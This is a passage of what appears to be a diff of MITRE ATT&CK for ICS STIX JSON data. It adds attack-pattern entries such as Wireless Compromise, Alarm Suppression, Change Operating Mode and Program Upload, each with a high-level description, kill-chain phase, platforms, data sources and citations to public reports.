(Citation: CISA AA21-201A Pipeline Intrusion July 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation", + "Human-Machine Interface" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Process: Process Creation", + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "Command: Command Execution", + "File: File Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0863", + "external_id": "T0863" + }, + { + "source_name": "Booz Allen Hamilton", + "description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 ", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + }, + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + }, + { + "source_name": "CISA AA21-201A Pipeline Intrusion July 2021", + "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 
2021/10/08 ", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:20:38.285Z", + "name": "Wireless Compromise", + "description": "Adversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network. Access to a wireless network may be gained through the compromise of a wireless device. (Citation: Alexander Bolshev, Gleb Cherbov July 2014) (Citation: Alexander Bolshev March 2014) Adversaries may also utilize radios and other wireless communication devices on the same frequency as the wireless network. Wireless compromise can be done as an initial access vector from a remote distance. \n\nA Polish student used a modified TV remote controller to gain access to and control over the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) The remote controller device allowed the student to interface with the trams network to modify track settings and override operator control. The adversary may have accomplished this by aligning the controller to the frequency and amplitude of IR control protocol signals. (Citation: Bruce Schneier January 2008) The controller then enabled initial access to the network, allowing the capture and replay of tram signals. 
(Citation: John Bill May 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_contributors": [ + "Scott Dougherty" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Control Server", + "Field Controller/RTU/PLC/IED", + "Input/Output Server" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Logon Session: Logon Session Creation", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0860", + "external_id": "T0860" + }, + { + "source_name": "Alexander Bolshev March 2014", + "description": "Alexander Bolshev 2014, March 11 S4x14: HART As An Attack Vector Retrieved. 2020/01/05 ", + "url": "https://www.slideshare.net/dgpeters/17-bolshev-1-13" + }, + { + "source_name": "Alexander Bolshev, Gleb Cherbov July 2014", + "description": "Alexander Bolshev, Gleb Cherbov 2014, July 08 ICSCorsair: How I will PWN your ERP through 4-20 mA current loop Retrieved. 2020/01/05 ", + "url": "https://www.blackhat.com/docs/us-14/materials/us-14-Bolshev-ICSCorsair-How-I-Will-PWN-Your-ERP-Through-4-20mA-Current-Loop-WP.pdf" + }, + { + "source_name": "Bruce Schneier January 2008", + "description": "Bruce Schneier 2008, January 17 Hacking Polish Trams Retrieved. 2019/10/17 ", + "url": "https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html" + }, + { + "source_name": "John Bill May 2017", + "description": "John Bill 2017, May 12 Hacked Cyber Security Railways Retrieved. 
2019/10/17 ", + "url": "https://www.londonreconnections.com/2017/hacked-cyber-security-railways/" + }, + { + "source_name": "Shelley Smith February 2008", + "description": "Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17 ", + "url": "https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Change Operating Mode", + "description": "Adversaries may change the operating mode of a controller to gain additional access to engineering functions such as Program Download. Programmable controllers typically have several modes of operation that control the state of the user program and control access to the controllers API. Operating modes can be physically selected using a key switch on the face of the controller but may also be selected with calls to the controllers API. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below: \n\n* Program - This mode must be enabled before changes can be made to a devices program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLCs logic Is halted, and all outputs may be forced off. (Citation: N.A. October 2017) \n* Run - Execution of the devices program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the programs logic. [Program Upload](https://attack.mitre.org/techniques/T0845) and [Program Download](https://attack.mitre.org/techniques/T0843) are disabled while in this mode. (Citation: Omron) (Citation: Machine Information Systems 2007) (Citation: N.A. 
October 2017) (Citation: PLCgurus 2021) \n* Remote - Allows for remote changes to a PLCs operation mode. (Citation: PLCgurus 2021) \n* Stop - The PLC and program is stopped, while in this mode, outputs are forced off. (Citation: Machine Information Systems 2007) \n* Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers. (Citation: Machine Information Systems 2007) \n* Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization. (Citation: Omron)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content", + "Operational Databases: Device Alarm" + ], + "type": "attack-pattern", + "id": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0858", + "external_id": "T0858" + }, + { + "source_name": "Machine Information Systems 2007", + "description": "Machine Information Systems 2007 How PLCs Work Retrieved. 
2021/01/28 ", + "url": "http://www.machine-information-systems.com/How_PLCs_Work.html" + }, + { + "source_name": "N.A. October 2017", + "description": "N.A. 2017, October What are the different operating modes in PLC? Retrieved. 2021/01/28 ", + "url": "https://forumautomation.com/t/what-are-the-different-operating-modes-in-plc/2489" + }, + { + "source_name": "Omron", + "description": "Omron Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 PLC Different Operating Modes Retrieved. 2021/01/28 ", + "url": "https://www.omron-ap.com/service_support/FAQ/FAQ00002/index.asp#:~:text=In%20PROGRAM%20mode%2C%20the%20CPU,can%20be%20created%20or%20modified." + }, + { + "source_name": "PLCgurus 2021", + "description": "PLCgurus 2021 PLC Basics Modes Of Operation Retrieved. 2021/01/28 ", + "url": "https://www.plcgurus.net/plc-basics/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:13:55.599Z", + "name": "Alarm Suppression", + "description": "Adversaries may target protection function alarms to prevent them from notifying operators of critical conditions. Alarm messages may be a part of an overall reporting system and of particular interest for adversaries. Disruption of the alarm system does not imply the disruption of the reporting system as a whole.\n\nA Secura presentation on targeting OT notes a dual fold goal for adversaries attempting alarm suppression: prevent outgoing alarms from being raised and prevent incoming alarms from being responded to. 
(Citation: Jos Wetzels, Marina Krotofil 2019) The method of suppression may greatly depend on the type of alarm in question: \n\n* An alarm raised by a protocol message \n* An alarm signaled with I/O \n* An alarm bit set in a flag (and read) \n\nIn ICS environments, the adversary may have to suppress or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression may involve tampering or altering device displays and logs, modifying in memory code to fixed values, or even tampering with assembly level instruction code.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_contributors": [ + "Marina Krotofil", + "Jos Wetzels - Midnight Blue" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Device Configuration/Parameters" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Operational Databases: Process History/Live Data", + "Network Traffic: Network Traffic Flow", + "Operational Databases: Process/Event Alarm", + "Operational Databases: Device Alarm" + ], + "type": "attack-pattern", + "id": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0878", + "external_id": "T0878" + }, + { + "source_name": "Jos Wetzels, Marina Krotofil 2019", + "description": "Jos Wetzels, Marina Krotofil 2019 A Diet of Poisoned Fruit: Designing Implants & OT Payloads for ICS Embedded Devices Retrieved. 
2019/11/01 ", + "url": "https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Detect Operating Mode", + "description": "Adversaries may gather information about a PLCs or controllers current operating mode. Operating modes dictate what change or maintenance functions can be manipulated and are often controlled by a key switch on the PLC (e.g., run, prog [program], and remote). Knowledge of these states may be valuable to an adversary to determine if they are able to reprogram the PLC. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below: \n\n* Program - This mode must be enabled before changes can be made to a devices program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLCs logic Is halted, and all outputs may be forced off. (Citation: N.A. October 2017) \n* Run - Execution of the devices program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the programs logic.[Program Upload](https://attack.mitre.org/techniques/T0845) and [Program Download](https://attack.mitre.org/techniques/T0843) are disabled while in this mode. (Citation: Omron) (Citation: Machine Information Systems 2007) (Citation: N.A. October 2017) (Citation: PLCgurus 2021) \n* Remote - Allows for remote changes to a PLCs operation mode. (Citation: PLCgurus 2021) \n* Stop - The PLC and program is stopped, while in this mode, outputs are forced off. (Citation: Machine Information Systems 2007) \n* Reset - Conditions on the PLC are reset to their original states. 
Warm resets may retain some memory while cold resets will reset all I/O and data registers. (Citation: Machine Information Systems 2007) \n* Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization. (Citation: Omron)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0868", + "external_id": "T0868" + }, + { + "source_name": "Machine Information Systems 2007", + "description": "Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 ", + "url": "http://www.machine-information-systems.com/How_PLCs_Work.html" + }, + { + "source_name": "N.A. October 2017", + "description": "N.A. 2017, October What are the different operating modes in PLC? Retrieved. 2021/01/28 ", + "url": "https://forumautomation.com/t/what-are-the-different-operating-modes-in-plc/2489" + }, + { + "source_name": "Omron", + "description": "Omron Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 PLC Different Operating Modes Retrieved. 
2021/01/28 ", + "url": "https://www.omron-ap.com/service_support/FAQ/FAQ00002/index.asp#:~:text=In%20PROGRAM%20mode%2C%20the%20CPU,can%20be%20created%20or%20modified." + }, + { + "source_name": "PLCgurus 2021", + "description": "PLCgurus 2021 PLC Basics Modes Of Operation Retrieved. 2021/01/28 ", + "url": "https://www.plcgurus.net/plc-basics/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of Protection", + "description": "Adversaries may compromise protective system functions designed to prevent the effects of faults and abnormal conditions. This can result in equipment damage, prolonged process disruptions and hazards to personnel. \n\nMany faults and abnormal conditions in process control happen too quickly for a human operator to react to. Speed is critical in correcting these conditions to limit serious impacts such as Loss of Control and Property Damage. \n\nAdversaries may target and disable protective system functions as a prerequisite to subsequent attack execution or to allow for future faults and abnormal conditions to go unchecked. Detection of a Loss of Protection by operators can result in the shutdown of a process due to strict policies regarding protection systems. 
This can cause a Loss of Productivity and Revenue and may meet the technical goals of adversaries seeking to cause process disruptions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--2bb4d762-bf4a-4bc3-9318-15cc6a354163", + "created": "2021-04-12T07:57:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0837", + "external_id": "T0837" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Monitor Process State", + "description": "Adversaries may gather information about the physical process state. This information may be used to gain more information about the process itself or used as a trigger for malicious actions. 
The sources of process state information may vary such as, OPC tags, historian data, specific PLC block information, or network traffic.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0801", + "external_id": "T0801" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Scripting", + "description": "Adversaries may use scripting languages to execute arbitrary code in the form of a pre-written script or in the form of user-supplied code to an interpreter. Scripting languages are programming languages that differ from compiled languages, in that scripting languages use an interpreter, instead of a compiler. These interpreters read and compile part of the source code just before it is executed, as opposed to compilers, which compile each and every line of code to an executable file. Scripting allows software developers to run their code on any system where the interpreter exists. 
This way, they can distribute one package, instead of precompiling executables for many different systems. Scripting languages, such as Python, have their interpreters shipped as a default with many Linux distributions. \n\nIn addition to being a useful tool for developers and administrators, scripting language interpreters may be abused by the adversary to execute code in the target environment. Due to the nature of scripting languages, this allows for weaponized code to be deployed to a target easily, and leaves open the possibility of on-the-fly scripting to perform a task.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Script: Script Execution", + "Module: Module Load", + "Process: Process Creation", + "Process: Process Metadata" + ], + "type": "attack-pattern", + "id": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0853", + "external_id": "T0853" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-17T15:14:31.276Z", + "name": "Remote System Information Discovery", + "description": "An adversary may attempt to get detailed information about remote systems and their peripherals, such as make/model, role, and configuration. 
Adversaries may use information from Remote System Information Discovery to aid in targeting and shaping follow-on behaviors. For example, the system's operational role and model information can dictate whether it is a relevant target for the adversary's operational objectives. In addition, the system's configuration may be used to scope subsequent technique usage. \n\nRequests for system information are typically implemented using automation and management protocols and are often automatically requested by vendor software during normal operation. This information may be used to tailor management actions, such as program download and system or module firmware. An adversary may leverage this same information by issuing calls directly to the system's API.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "File: File Access", + "Network Traffic: Network Traffic Content", + "Process: Process Creation", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "created": "2021-04-13T12:45:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0888", + "external_id": "T0888" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Program Upload", + 
"description": "Adversaries may attempt to upload a program from a PLC to gather information about an industrial process. Uploading a program may allow them to acquire and study the underlying logic. Methods of program upload include vendor software, which enables the user to upload and read a program running on a PLC. This software can be used to upload the target program to a workstation, jump box, or an interfacing device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0845", + "external_id": "T0845" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Exploit Public-Facing Application", + "description": "Adversaries may leverage weaknesses to exploit internet-facing software for initial access into an industrial network. Internet-facing software may be user applications, underlying networking implementations, an assets operating system, weak defenses, etc. 
Targets of this technique may be intentionally exposed for the purpose of remote management and visibility.\n\nAn adversary may seek to target public-facing applications as they may provide direct access into an ICS environment or the ability to move into the ICS network. Publicly exposed applications may be found through online tools that scan the internet for open ports and services. Version numbers for the exposed application may provide adversaries an ability to target specific known vulnerabilities. Exposed control protocol or remote access ports found in Commonly Used Port may be of interest by adversaries.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0819", + "external_id": "T0819" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T19:09:43.744Z", + "name": "Data from Information Repositories", + "description": "Adversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. 
Examples of information repositories include reference databases in the process environment, as well as databases in the corporate network that might contain information about the ICS.(Citation: Cybersecurity & Infrastructure Security Agency March 2018)\n\nInformation collected from these systems may provide the adversary with a better understanding of the operational environment, vendors used, processes, or procedures of the ICS.\n\nIn a campaign between 2011 and 2013 against ONG organizations, Chinese state-sponsored actors searched document repositories for specific information such as, system manuals, remote terminal unit (RTU) sites, personnel lists, documents that included the string SCAD*, user credentials, and remote dial-up access information. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Data Historian" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Logon Session: Logon Session Creation", + "Network Share: Network Share Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0811", + "external_id": "T0811" + }, + { + "source_name": "Cybersecurity & Infrastructure Security Agency March 2018", + "description": "Cybersecurity & Infrastructure Security Agency 2018, March 15 Alert (TA18-074A) Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 
2019/10/11 ", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-074A" + }, + { + "source_name": "CISA AA21-201A Pipeline Intrusion July 2021", + "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-30T20:19:41.272Z", + "name": "Transient Cyber Asset", + "description": "Adversaries may target devices that are transient across ICS networks and external networks. Normally, transient assets are brought into an environment by authorized personnel and do not remain in that environment on a permanent basis. (Citation: North American Electric Reliability Corporation June 2021) Transient assets are commonly needed to support management functions and may be more common in systems where a remotely managed asset is not feasible, external connections for remote access do not exist, or 3rd party contractor/vendor access is required. \n\nAdversaries may take advantage of transient assets in different ways. For instance, adversaries may target a transient asset when it is connected to an external network and then leverage its trusted access in another environment to launch an attack. They may also take advantage of installed applications and libraries that are used by legitimate end-users to interact with control system devices. 
\n\nTransient assets, in some cases, may not be deployed with a secure configuration leading to weaknesses that could allow an adversary to propagate malicious executable code, e.g., the transient asset may be infected by malware and when connected to an ICS environment the malware propagates onto other systems. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Engineering Workstation" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "created": "2021-10-14T15:25:32.143Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0864", + "external_id": "T0864" + }, + { + "source_name": "North American Electric Reliability Corporation June 2021", + "description": "North American Electric Reliability Corporation 2021, June 28 Glossary of Terms Used in NERC Reliability Standards Retrieved. 2021/10/11 ", + "url": "https://www.nerc.com/files/glossary_of_terms.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-20T20:46:11.459Z", + "name": "Manipulate I/O Image", + "description": "Adversaries may manipulate the I/O image of PLCs through various means to prevent them from functioning as expected. 
